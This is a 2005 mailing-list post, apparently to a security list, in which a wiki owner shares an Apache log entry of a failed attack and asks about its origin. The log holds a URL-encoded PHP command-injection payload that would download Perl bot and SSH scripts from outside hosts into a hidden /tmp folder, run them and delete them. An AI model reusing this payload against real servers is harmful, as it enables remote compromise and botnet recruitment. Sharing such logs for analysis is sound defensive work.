Attempted exploit for some web service.

[Robin <robin () kallisti net nz>]

Hi, I just got this in my apache logs:
65.39.227.110 - - [28/Jan/2005:00:23:26 +1300] 
"GET /RobinsStuff/UnsortedLinks&r
ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te
mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/
.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6
5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
%70%61%73%73%74%68%72%75%28%24%48%5
4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 
11746 "-" "LWP::Simple/5.65"

(sorry about the wrapping). Now, I know it didn't hurt the service it hit, as 
it's a Wiki page, and the software ignores any unexpected parameters on the 
URL. I'm wondering where it comes from, however. It's also useful to note 
that that IP address hadn't touched my webserver at all recently, other than 
this. Out of curiosity, I checked, and both the URLs that it tries to wget 
stuff from are 404.

-- 
Robin <robin () kallisti net nz>             JabberID: <eythian () jabber org>

Hostes alienigeni me abduxerunt. Qui annus est?

PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8  7175 14D3 6485 A99C EB6D

Attachment: _bin
Description: